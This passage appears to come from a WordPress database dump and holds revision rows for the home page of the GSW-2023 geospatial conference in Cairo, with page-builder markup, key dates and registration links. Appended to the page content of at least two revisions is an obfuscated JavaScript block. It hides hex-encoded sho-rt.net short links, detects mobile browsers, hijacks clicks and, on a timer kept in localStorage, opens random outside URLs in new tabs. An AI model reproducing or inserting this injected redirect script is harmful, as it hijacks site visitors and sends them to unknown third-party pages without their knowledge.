)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 19:11:49','2022-11-09 19:11:49','',3066,'https://gsw2023.com/?p=3205',0,'revision','',0),
(3206,1,'2022-11-09 19:12:48','2022-11-09 19:12:48','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h2><strong> EGYPT GSW\'2023</strong></h2>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 19:12:48','2022-11-09 19:12:48','',3066,'https://gsw2023.com/?p=3206',0,'revision','',0),
(3207,1,'2022-11-09 19:56:23','2022-11-09 19:56:23','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h2 style=\"text-align: justify; color: #311b92;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the 